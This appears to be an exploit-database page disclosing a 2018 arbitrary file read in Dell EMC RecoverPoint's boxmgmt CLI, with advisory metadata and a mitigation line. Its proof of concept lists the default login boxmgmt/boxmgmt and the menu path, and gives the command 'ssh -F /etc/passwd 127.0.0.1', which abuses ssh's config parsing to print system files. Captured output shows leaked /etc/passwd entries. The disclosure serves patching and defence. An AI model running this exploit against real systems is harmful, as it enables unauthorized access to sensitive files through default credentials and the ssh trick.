header-logo
Suggest Exploit
vendor:
RecoverPoint
by:
Paul Taylor
7.5
CVSS
HIGH
Arbitrary File Read
22
CWE
Product Name: RecoverPoint
Affected Version From: All versions before RP 5.1.2, and all versions before RP4VMs 5.1.1.3
Affected Version To: RP4VMs 5.1.1.2, RP 5.1.SP1.P2
Patch Exists: YES
Related CWE: N/A
CPE: a:dell:emc_recoverpoint
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: RP4VMs 5.1.1.2, RP 5.1.SP1.P2
2018

Dell EMC RecoverPoint boxmgmt CLI < 5.1.2 - Arbitrary File Read

When logging in as boxmgmt and running an internal command, the ssh command may be used to display the contents of files from the file system which are accessible to the boxmgmt user. Log in as boxmgmt via SSH (default credentials boxmgmt/boxmgmt) Select [3] Diagnostics Select [5] Run Internal Command ssh -F /etc/passwd 127.0.0.1

Mitigation:

Ensure that the boxmgmt user is not allowed to access sensitive files on the system.
Source

Exploit-DB raw data:

# Exploit Title: Dell EMC RecoverPoint boxmgmt CLI < 5.1.2 - Arbitrary File Read
# Version: All versions before RP 5.1.2, and all versions before RP4VMs 5.1.1.3
# Date: 2018-05-21
# Vendor Advisory: DSA-2018-095
# Vendor KB: https://support.emc.com/kb/521234
# Exploit Author: Paul Taylor
# Github: https://github.com/bao7uo/dell-emc_recoverpoint
# Website: https://www.foregenix.com/blog/foregenix-identify-dell-emc-recoverpoint-zero-day-vulnerabilities
# Tested on: RP4VMs 5.1.1.2, RP 5.1.SP1.P2
# CVE: N/A
 
# 1. Description
# When logging in as boxmgmt and running an internal command, the ssh command may be used
# to display the contents of files from the file system which are accessible to the boxmgmt user.
 
# 2. Proof of Concept
# Log in as boxmgmt via SSH (default credentials boxmgmt/boxmgmt)
# Select [3] Diagnostics
# Select [5] Run Internal Command
# ssh -F /etc/passwd 127.0.0.1

test-cluster: 5
This is the list of commands you are allowed to use: ALAT NetDiag arp arping date ethtool kps.pl netstat ping ping6 ssh telnet top uptime
Enter internal command: ssh -F /etc/passwd 127.0.0.1
/etc/passwd: line 1: Bad configuration option: root:x:0:0:root:/root:/bin/tcsh
/etc/passwd: line 2: Bad configuration option: daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
/etc/passwd: line 3: Bad configuration option: bin:x:2:2:bin:/bin:/usr/sbin/nologin
<SNIP>
/etc/passwd: terminating, 34 bad configuration options
Command "ssh -F /etc/passwd 127.0.0.1" exited with return code 65280